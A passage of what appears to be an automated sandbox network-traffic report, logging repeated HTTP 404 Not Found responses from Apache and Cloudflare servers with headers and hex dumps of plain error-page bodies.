32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:21:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:21:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:21:52 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:21:58 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BRTBchQ6luVEOTnJMiizNaMnMQQb%2F2c8WRYIRaUmhYEpkSs30eIs3yS%2BQeBQUJpPvzXd0EbsUnusHNO6umjwbhKI6X0GpX04mLqX%2Bm5spHLWPgDFWgTCu8fQJUAXzvyh6%2BarcCTFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9204141a586ec339-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d8l5QeeKgZgmPaYX%2B32g%2FHioIz%2B9wgSXPOWZYLIfdTnj0nI%2BhfyyFCBa35Wt2W6gL0l3WwbKPZ4lLrbBj0w%2FTxU0avAjqhmlx2oMDKEJRg5YXQmaVN%2B9N4Knh48N8vgMuiCighwp3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9204142a7d2d7d02-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCgylk6zhK3Aoglrfu4mjq%2BNqWUGUpCziNjNuSeIQZip8F82sIz7e9VrSAXNj9xifIHTFVbX%2B1wuzgbFo6lrC71PTHW7j5bAm%2FyhqNpY6bQaKh7gNxrwc20Hbtei7GfxZn7%2BQNsxXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9204143a6b880f7f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=12915&min_rtt=12915&rtt_var=6457&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=988&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 13:22:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DiN1NrVKCb54GhSou5Cvz67jbTRTmirNH0jYKTh8tWpyhpXbpNEOU8XIKft7dmdnvzQHLxXR5G%2F6WSjoJWMow42I7FQkRdZTICHd5enLtEmqLC3AQJg40g2SJWXOxLAUHT3S9%2FPR%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9204144a2dca42fc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 